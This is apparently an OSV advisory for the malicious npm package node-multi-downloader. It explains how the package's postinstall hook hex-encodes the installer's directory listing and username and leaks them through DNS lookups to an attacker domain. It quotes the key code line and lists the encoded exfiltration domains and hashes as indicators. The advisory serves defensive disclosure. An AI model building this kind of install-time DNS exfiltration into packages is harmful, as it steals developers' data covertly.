MAL-2026-5735

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-multi-downloader/MAL-2026-5735.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5735
Published
2026-06-13T07:04:03Z
Modified
2026-06-13T07:31:42.256186039Z
Summary
Malicious code in node-multi-downloader (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68)

On npm install, this package's postinstall hook (node index.js) hex-encodes the installer's current working directory, the first 15 entries of that directory, and os.userInfo().username, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain uqlyosvp1f9.oob.evilsec.xyz. The hardcoded out-of-band domain is bound at index.js line 1 (const D = "uqlyosvp1f9.oob.evilsec.xyz") and index.js line 8 calls dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A', ...) to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading the installer's filesystem and identity at install time.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006322",
            "versions": [
                "5.0.14-rc.3"
            ],
            "sha256": "77464387879005e5c35e332c1b9f9826ea1af7dec30cad7d06fe1023d553f1f4",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T07:04:03Z",
            "import_time": "2026-06-13T07:25:39.73129435Z"
        },
        {
            "id": "IN-MAL-2026-006321",
            "versions": [
                "5.0.14-rc.3"
            ],
            "sha256": "8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T07:04:03Z",
            "import_time": "2026-06-13T07:25:39.675878525Z"
        }
    ]
}
References
Credits

Affected packages

npm / node-multi-downloader

Package

Name
node-multi-downloader
Purl
pkg:npm/node-multi-downloader

Affected ranges

Affected versions

5.*
5.0.14-rc.3

Database specific

indicators
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "3a87bc4174ea8f94807555d6841cfd778d5c6aa796a66a5ea78a2ae3721de89f",
            "tlsh": "01f050f923f5a1f494666480c1b48d0a2273cb121173c090b81d68d6abd38f4bbe6971"
        }
    ],
    "package_integrity": [
        {
            "filename": "node-multi-downloader-5.0.14-rc.3.tgz",
            "hashes": {
                "sha512_sri": "sha512-nRN1LlwWX0jlka6fweawaXGmfEE0UNh/zzNKCzmLEs4NdSRQKZCWVMpgL45REz8KEF1t25Pd09ZmlL4Ld0VQqg==",
                "sha1": "def4f059880087a00597558d8862a4171c2851b5"
            }
        }
    ],
    "ips": [
        "104.16.8.34",
        "10.1.0.2"
    ],
    "domains": [
        "2e6e706d2c6e6f64655f6d6f64756c65732c7061636b6167652d6c6f636b2e.fil0.uqlyosvp1f9.oob.evilsec.xyz",
        "6a736f6e2c7061636b6167652e6a736f6e.fil1.uqlyosvp1f9.oob.evilsec.xyz",
        "6c74692d646f776e6c6f61646572.cwd1.uqlyosvp1f9.oob.evilsec.xyz",
        "696e6465782e6a732c7061636b6167652e6a736f6e.fil0.uqlyosvp1f9.oob.evilsec.xyz",
        "7363616e.usr0.uqlyosvp1f9.oob.evilsec.xyz",
        "2f686f6d652f7363616e.cwd0.uqlyosvp1f9.oob.evilsec.xyz"
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/node-multi-downloader/MAL-2026-5735.json"